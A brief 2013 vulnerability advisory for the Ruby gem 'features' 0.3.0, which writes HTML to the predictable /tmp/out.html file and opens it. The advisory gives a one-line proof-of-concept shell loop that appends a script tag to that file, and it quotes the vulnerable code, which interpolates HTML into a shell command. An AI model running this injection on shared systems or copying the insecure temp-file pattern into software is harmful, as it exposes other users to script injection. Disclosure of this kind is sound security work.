Ruby Gem Features version 0.3.0 suffers from a file injection vulnerability that can lead to cross site scripting.
cda6fa9ea76cdb6b437f75ce82bada8e
Title: Features 0.3.0 Ruby gem file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0
Download: http://rubygems.org/gems/features
Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"
Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html
By a malicious user creating /tmp/out.html first and repeatedly writing to it they can inject malicious html into the file right before it is about to be opened.
PoC:
nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
Will pop up a java script alert in other gem users browser.
Code:
+--------------------[./features-0.3.0/lib/suite.rb]-------------------+
html = parse_results(results).html
%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end
def parse_results_and_open_in_safari(results) -- end
def open_in_safari(html)
%x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' ) end
Vendor: Not notified
Comments
Subscribe to this comment feedNo comments yet, be the first!